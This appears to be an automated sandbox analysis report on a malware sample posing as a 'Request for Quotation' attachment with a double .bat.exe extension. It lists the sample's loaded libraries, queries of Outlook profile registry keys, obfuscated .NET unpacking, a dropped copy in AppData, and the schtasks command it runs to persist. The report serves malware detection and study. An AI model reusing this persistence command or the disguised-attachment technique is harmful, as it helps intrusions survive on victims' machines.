Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs .Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs .Net Code: KZPpdhKyfa System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 0_2_06C576A0 push eax; ret 0_2_06C576A1
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Code function: 9_2_01259C30 push esp; retf 0127h 9_2_01259D55
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 11_2_069A76A0 push eax; ret 11_2_069A76A1
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Code function: 14_2_06DB9241 push es; ret 14_2_06DB9244
Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Static PE information: section name: .text entropy: 7.944191004977694
Source: jnqeRRexnD.exe.0.dr Static PE information: section name: .text entropy: 7.944191004977694
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, UPSlk94tjStGG9oASY.cs High entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ovvxIOBcgJSvJUVhrj.cs High entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, jQhdguv7LgIcxDIctV.cs High entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.cs High entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.cs High entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, X7d5Q5p1LvpfLmNfVx.cs High entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, Ii9Xnwkaay1WuTYMGQ.cs High entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, x5ws4ZMjtJeIYwNfXm.cs High entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, aeNkwmhsZGOkwOyTql.cs High entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, sCMxesXXjqAegoG9j6G.cs High entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, iMBWkb0as7CGSU5mdc.cs High entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, H9Z5mTAKXZyOtcycmt.cs High entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, cVsg14PySj56ttQ831.cs High entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, QqELW6HxRqDoYT0tcl.cs High entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, POlyOhfijgKRcdlA2f.cs High entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, ERskp5zfMQtJPNdwj4.cs High entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, hJrajR89jKhw22GlAw.cs High entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, v1YFv8XpsPxjF1eUO8l.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, f0fXPuminhNt55QPq6.cs High entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, knUupbQZqxsA2ZB6Nx.cs High entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, RjDupPnYBMvHAAEH05.cs High entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, o9P0T5X38MD9r6NPGD7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, UPSlk94tjStGG9oASY.cs High entropy of concatenated method names: 'Dispose', 'nyOXmtcycm', 'ncjM0COuFn', 'Ryd8rdIDSY', 'kojXPJXRsR', 'mlyXzPY0g0', 'ProcessDialogKey', 'NAUM30fXPu', 'KnhMXNt55Q', 'Yq6MMjVsg1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ovvxIOBcgJSvJUVhrj.cs High entropy of concatenated method names: 'UH7xGeYKRv', 'suMxOi4bLu', 'YkCJwDuCBx', 'CIJJ2IicfO', 'tJgJWSqQCm', 'RNUJuqHyFB', 'Fl8Ji8tEFl', 'XojJap65Xy', 'HNqJn2uMoK', 'BFKJqSt3uP'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, jQhdguv7LgIcxDIctV.cs High entropy of concatenated method names: 'tdXJbLmLJN', 'wtNJ5F2XGJ', 'a2uJTN1BTh', 'DelJvJkeZN', 'BkXJsNb30U', 'QLAJoPZjR4', 'gQEJCYbJJD', 'H3BJS9WEgX', 'fliJKSg9CD', 'TclJI2gNkS'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.cs High entropy of concatenated method names: 'Gt14hMpllf', 'zEW4cObXUC', 'frf4fy9iIb', 'QfD4QhBXjv', 'eL947eBR1L', 'ikO48VVO4t', 'X2P4A0lkna', 'YPH41ZhEfg', 'pnn4mUpZKZ', 'COV4PFcTKR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.cs High entropy of concatenated method names: 'QDtjr11tKm', 'UUrjU49qJd', 'g7tj4QHM48', 'awZjJRiMIZ', 'awajxJRu42', 'e4ljR4731R', 'uuuj6HIdGg', 'TC5jtyvNw6', 'si2jgVKoBS', 'yqWjeUgbbc'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, X7d5Q5p1LvpfLmNfVx.cs High entropy of concatenated method names: 'SLWX6qK2bv', 'iFxXt9IG6S', 'K7LXegIcxD', 'sctXVVsvvx', 'fVhXsrj2i9', 'bnwXoaay1W', 'ayVhTvcLwYx7MGWuJp', 'ThHsqpwi38yuvFC4sl', 'PoHXXOnfRJ', 'TsbXjVn1ma'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, Ii9Xnwkaay1WuTYMGQ.cs High entropy of concatenated method names: 'snVRr27LLB', 'XwRR4ewhUs', 'kA3RxXBmxc', 't40R6X24ul', 'EaaRt3DteG', 'oQ6x7fcZCj', 'zB0x8SrmNF', 'SsExAE6Xin', 'xJrx1hETfn', 'f3OxmXt73i'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, x5ws4ZMjtJeIYwNfXm.cs High entropy of concatenated method names: 'InjdTZvVf', 'TXybLluH1', 'ndV52bYIZ', 'x7jOYmCiP', 'VQ2vYiAn0', 'ceGBiBmbJ', 'GlcFJwivkdVF41xoQp', 'u387ZwKPkEI0hKBwYC', 'g6wSbqWwt', 'GyvIAILEQ'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, aeNkwmhsZGOkwOyTql.cs High entropy of concatenated method names: 'Y4wsq8jvKA', 'ibVs9aalCb', 'wvrshDHEUc', 'MaCscPEI4x', 'Fmss0yjfX8', 'ofDswdCPm4', 'Pfcs29bdTt', 'U65sWpubWw', 'xrlsuopxKW', 'PxlsibRCm9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, sCMxesXXjqAegoG9j6G.cs High entropy of concatenated method names: 'mtuIPLpvlZ', 'T8nIzuAGue', 'BHtF3Wh9YW', 'wQYFXZURKH', 'WE8FMWJLpN', 'jf1FjEEDJQ', 'zRHFpCOKeS', 'TadFrornBY', 'NkkFUprOXH', 'oxnF4LKOcv'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, iMBWkb0as7CGSU5mdc.cs High entropy of concatenated method names: 'rlBdmTof08XIpNNmvA9', 'x4KGnhoIo3aZn0c9ad7', 'hVy7H0oWykCxGEwBAIJ', 'j3lRSPQYmu', 'facRK23vv3', 'EUQRIxnoeQ', 'VCKlbXoVlIftl0hiTXd', 'ejl0LRoMKPmStRhdDJ1'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, H9Z5mTAKXZyOtcycmt.cs High entropy of concatenated method names: 'X5fKsBoBh6', 'rIkKCqkXGW', 'TVnKK6pMcH', 'NwWKF1leWs', 'rPXKLBudfn', 'U69KYaEJJc', 'Dispose', 'LBQSUywCSo', 'bpgS4sZPQg', 'VB3SJm4Qt8'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, cVsg14PySj56ttQ831.cs High entropy of concatenated method names: 'pjhIJPIkDB', 'zQWIxckejE', 'ugaIRvXOZv', 'hvVI6Nwpym', 'MLfIK47VvQ', 'aWnItIlQE9', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, QqELW6HxRqDoYT0tcl.cs High entropy of concatenated method names: 'hwvZTpUQt7', 'cQ0ZvkafiP', 'P2RZkTPB3R', 'NOQZ06L8Pg', 'LwcZ2RAPSU', 'M32ZWS5KD1', 'EMeZiCpRUn', 'Wj8ZanqSKC', 'pRNZqnEZha', 'mtUZyfyOkB'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, POlyOhfijgKRcdlA2f.cs High entropy of concatenated method names: 'ToString', 'SNdoyAetvR', 'Rmko0DEDVf', 'jDcowRn8SW', 'Hxno2IXLt5', 'mPXoWp6a0u', 'jlwouOvq6G', 'CttoiH38D0', 'FLLoahOYV8', 'zuNonmnCR6'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, ERskp5zfMQtJPNdwj4.cs High entropy of concatenated method names: 'nerI5XJyJi', 'DivIT4CmsE', 'R9uIv4NIgh', 'd5RIk3cCZy', 'vLZI0WsSCI', 'LqSI2rDvcO', 'mbBIWX2rGX', 'X51IYgwjce', 'g81IlFMDo7', 'vulIExB0Z0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, hJrajR89jKhw22GlAw.cs High entropy of concatenated method names: 'cdqC1Eusu8', 'L10CPWuwOp', 'LA9S3HM9jX', 'VjiSXipYYj', 'BphCylAee5', 'HWsC9g5Zpg', 'Os4CHbRi3C', 'MYsChrMtN0', 'DwXCc7XpC7', 'CXDCfZe93N'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, v1YFv8XpsPxjF1eUO8l.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LsHDK40kxL', 'sSoDIWcED7', 'Jm0DFI8snB', 'GPmDDHhSU1', 'lJvDLfi3df', 'UIoDN8r4xo', 'ThmDYpc4Kh'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, f0fXPuminhNt55QPq6.cs High entropy of concatenated method names: 'in1Kk02VQW', 'xyEK0Yi134', 'eZZKw0VydV', 'E9RK2ZZRyJ', 'sNcKW880HP', 'rQRKutqe8l', 'T5OKi9Nmtw', 'sbBKaL7eU0', 'BlYKnnVGre', 'uZWKqGmvye'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, knUupbQZqxsA2ZB6Nx.cs High entropy of concatenated method names: 'trYCetiBJr', 'oZSCV54kgX', 'ToString', 'DSSCUO5J8g', 'qogC4CPpuO', 'OjZCJ1Bjyr', 'EnkCxYnGqk', 'hIiCRgWvQR', 'OKiC63crjl', 'sYrCtlUwoN'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, RjDupPnYBMvHAAEH05.cs High entropy of concatenated method names: 'EMK6lORSei', 'UQ16EU8pn3', 'iIq6dCl0sx', 'JMp6b0hOq2', 'zfw6Gc4XZe', 'CCy65Rgc6r', 'gQU6OXUZNR', 'TTX6T6NNaq', 'jXk6vgabsW', 'aAR6BobCCx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, o9P0T5X38MD9r6NPGD7.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'd2dIyITnWQ', 'NDRI9rOv4L', 'zxHIHKvtqE', 'YdZIhRxkFp', 'jjeIc7nYYR', 'tTyIfEtWGD', 'kNqIQEIvBE'
Drops PE files
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe File created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
